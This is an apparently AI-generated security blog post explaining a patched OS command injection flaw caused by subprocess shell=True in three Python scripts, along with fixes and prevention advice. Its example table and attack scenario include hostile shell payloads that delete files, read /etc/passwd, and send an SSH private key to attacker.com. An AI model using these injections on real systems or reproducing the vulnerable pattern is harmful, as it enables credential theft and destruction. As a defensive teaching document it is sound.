Command Injection via shell=True: How One Flag Opens the Door to OS Takeover
Vulnerability: CWE-78 — OS Command Injection
Severity: 🔴 Critical
Affected Files:run_eval.py,improve_description.py,generate_review.py
Status: ✅ Patched
Introduction
There's a deceptively innocent-looking parameter in Python's subprocess module that has been responsible for countless critical security vulnerabilities: shell=True. When combined with user-supplied input, this single flag can transform a routine script execution into a full operating system takeover.
This post breaks down a recently patched critical vulnerability found in the skill-creator pipeline — a real-world example of how shell=True and unsanitized input create a perfect storm for command injection attacks. Whether you're a seasoned backend engineer or a developer just getting started with Python scripting, understanding this class of vulnerability is non-negotiable in today's threat landscape.
The Vulnerability Explained
What Is Command Injection?
OS Command Injection (CWE-78) occurs when an application passes user-controlled data to a system shell without proper sanitization. The shell — whether bash, sh, cmd.exe, or others — interprets special characters as control operators, not as literal data. This means an attacker can "break out" of the intended command and inject their own.
In Python, the danger zone looks like this:
# ❌ VULNERABLE: shell=True with user input
import subprocess
user_input = request.args.get("skill_name")
subprocess.Popen(f"run_eval --skill {user_input}", shell=True)
When shell=True is set, Python hands the entire string to the operating system shell for interpretation. The shell doesn't know or care which parts were "intended" by the developer — it processes everything according to its own syntax rules.
How Does the Shell Interpret Special Characters?
The OS shell recognizes a variety of characters as command operators:
| Character | Shell Meaning | Example Attack |
|---|---|---|
; |
Command separator | skill; rm -rf / |
\| |
Pipe output to next command | skill \| curl attacker.com |
&& |
Run next if previous succeeds | skill && cat /etc/passwd |
\|\| |
Run next if previous fails | skill \|\| whoami |
` |
Command substitution | skill`id` |
$() |
Command substitution | skill$(cat ~/.ssh/id_rsa) |
> |
Redirect output | skill > /tmp/backdoor.sh |
The Vulnerable Code Pattern
In the skill-creator pipeline, three scripts were identified as invoking subprocess.Popen or subprocess.run with shell=True while incorporating user-supplied CLI arguments directly into the command string:
# ❌ VULNERABLE pattern (simplified illustration)
import subprocess
import sys
skill_path = sys.argv[1] # User-controlled input from CLI argument
# The entire string is passed to the shell — shell=True is the culprit
result = subprocess.Popen(
f"python evaluate.py --input {skill_path}",
shell=True,
stdout=subprocess.PIPE
)
This pattern appeared across:
- resources/skills/skill-creator/scripts/run_eval.py (line 85)
- resources/skills/skill-creator/scripts/improve_description.py
- resources/skills/skill-creator/eval-viewer/generate_review.py
A Concrete Attack Scenario
Let's make this tangible. Imagine a developer runs the skill evaluation pipeline and the skill_path argument is sourced from an external input — a config file, an API response, a web form, or even a crafted filename:
Normal input:
/home/user/skills/my_skill
Malicious input:
/home/user/skills/my_skill; curl -s https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) &
The shell now executes two commands:
1. python evaluate.py --input /home/user/skills/my_skill ← intended
2. curl -s https://attacker.com/exfil?data=<base64-encoded SSH private key> ← injected
In a CI/CD pipeline or automated evaluation environment, this could lead to:
- 🔑 Credential theft — SSH keys, API tokens, environment variables
- 🗂️ Data exfiltration — source code, model weights, proprietary datasets
- 🚪 Backdoor installation — persistent access via reverse shells
- 💣 Destructive actions — file deletion, service disruption
- 🌐 Lateral movement — pivoting to other systems on the network
The impact is classified as Critical because successful exploitation grants the attacker the same OS-level privileges as the process running the script — with no authentication required beyond the ability to influence the input.
The Fix
The Core Principle: Never Use shell=True with User Input
The fix involves two complementary changes:
- Remove
shell=True— pass commands as a list instead of a string - Validate and sanitize inputs — never trust external data
Before vs. After
❌ Before (Vulnerable):
import subprocess
import sys
skill_path = sys.argv[1]
# shell=True interprets the entire string through the OS shell
result = subprocess.Popen(
f"python evaluate.py --input {skill_path}",
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
✅ After (Fixed):
import subprocess
import sys
import shlex
import os
skill_path = sys.argv[1]
# Validate the input before use
if not os.path.exists(skill_path):
raise ValueError(f"Invalid skill path: {skill_path}")
# Pass as a list — no shell interpretation, no injection possible
result = subprocess.Popen(
["python", "evaluate.py", "--input", skill_path],
shell=False, # explicit is better than implicit
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
Why Does the List Form Prevent Injection?
When you pass a list to subprocess.Popen (without shell=True), Python uses execvp (on Unix) or CreateProcess (on Windows) to launch the process directly. Each list element becomes a discrete argument — the OS never invokes a shell to interpret the string.
This means special characters like ;, |, and $() are passed literally to the target program as part of an argument value. They have no special meaning. The attack surface disappears entirely.
# These are equivalent in intent, but VERY different in security:
# ❌ Shell interprets the string — injection possible
subprocess.run(f"echo {user_input}", shell=True)
# ✅ OS passes arguments directly — injection impossible
subprocess.run(["echo", user_input], shell=False)
When shell=True Is Genuinely Needed
Occasionally, shell features like glob expansion (*.txt), shell built-ins (cd, export), or pipe chaining are legitimately required. In those cases:
import shlex
# shlex.quote() wraps the value in single quotes and escapes internal quotes
safe_input = shlex.quote(user_input)
subprocess.run(f"some_command {safe_input}", shell=True)
However, shlex.quote() should be considered a last resort, not a first line of defense. Eliminating shell=True is always the preferred approach.
Prevention & Best Practices
1. Default to List-Form Subprocess Calls
Make it a team convention: subprocess calls always use list arguments unless there's a documented, reviewed reason to do otherwise.
# Establish this as your team's standard pattern
subprocess.run(["command", "arg1", "arg2", user_input], check=True)
2. Validate Inputs Before Processing
Apply allowlist validation to any input that will be used in a subprocess call:
import re
import os
def validate_skill_path(path: str) -> str:
"""Validate that a skill path is safe to use."""
# Allowlist: only alphanumerics, hyphens, underscores, slashes, dots
if not re.match(r'^[a-zA-Z0-9/_\-\.]+$', path):
raise ValueError(f"Skill path contains invalid characters: {path}")
# Ensure the path exists and is within the expected directory
abs_path = os.path.realpath(path)
allowed_base = os.path.realpath("/app/skills")
if not abs_path.startswith(allowed_base):
raise ValueError("Path traversal detected")
return abs_path
3. Apply the Principle of Least Privilege
Run scripts with the minimum permissions required. A command injection in a low-privilege process is far less damaging than one running as root or with broad cloud IAM permissions.
# Run evaluation scripts as a dedicated, restricted user
sudo -u skill-evaluator python run_eval.py --input "$SKILL_PATH"
4. Use Static Analysis Tools
Integrate security scanners into your CI/CD pipeline to catch these patterns automatically:
- Bandit — Python-specific security linter; detects
shell=Trueusage (rule B602, B603) - Semgrep — Highly customizable static analysis with rules for subprocess injection
- CodeQL — GitHub's semantic code analysis engine
- Safety — Checks Python dependencies for known vulnerabilities
# Example: Bandit in GitHub Actions
- name: Run Bandit Security Scan
run: |
pip install bandit
bandit -r . -ll --skip B101 -f json -o bandit-report.json
5. Code Review Checklist
Add these questions to your security-focused code review checklist:
- [ ] Does this code call
subprocesswithshell=True? - [ ] Does any subprocess argument originate from user input, environment variables, or external data sources?
- [ ] Is input validated against an allowlist before use?
- [ ] Does the process run with the minimum required privileges?
6. Relevant Security Standards
This vulnerability maps to well-established security standards:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command
- OWASP A03:2021: Injection (consistently in the OWASP Top 10)
- OWASP Testing Guide: WSTG-INPV-12 — Testing for Command Injection
- NIST SP 800-53: SI-10 — Information Input Validation
Conclusion
The shell=True vulnerability pattern is a textbook example of how a single, seemingly convenient parameter can introduce catastrophic security risk. The fix is straightforward — switch from string-based to list-based subprocess calls — but the lesson runs deeper: never trust user input, and always understand the security implications of the APIs you use.
Key takeaways from this vulnerability:
shell=True+ user input = command injection. This is one of the most reliable rules in application security.- The fix is simple but the impact of not fixing it is severe — Critical-severity vulnerabilities like this can lead to full system compromise.
- Defense in depth matters — Input validation, least privilege, and static analysis together create multiple layers of protection.
- Automated scanning catches what code review misses — Integrate tools like Bandit and Semgrep into your pipeline before code ships.
Security vulnerabilities like this one are rarely the result of malicious intent — they're the product of convenience, time pressure, and incomplete understanding of a platform's security model. The best defense is education, tooling, and a culture that treats security as a first-class concern alongside functionality and performance.
Write safe code. Review with security in mind. And when in doubt, check the docs for the security implications of every parameter you set.
This post was generated as part of an automated security fix workflow by OrbisAI Security. The vulnerability was identified by multi-agent AI scanning, patched, and verified through re-scan and LLM code review.
Have a vulnerability you'd like explained? Security education is the first line of defense.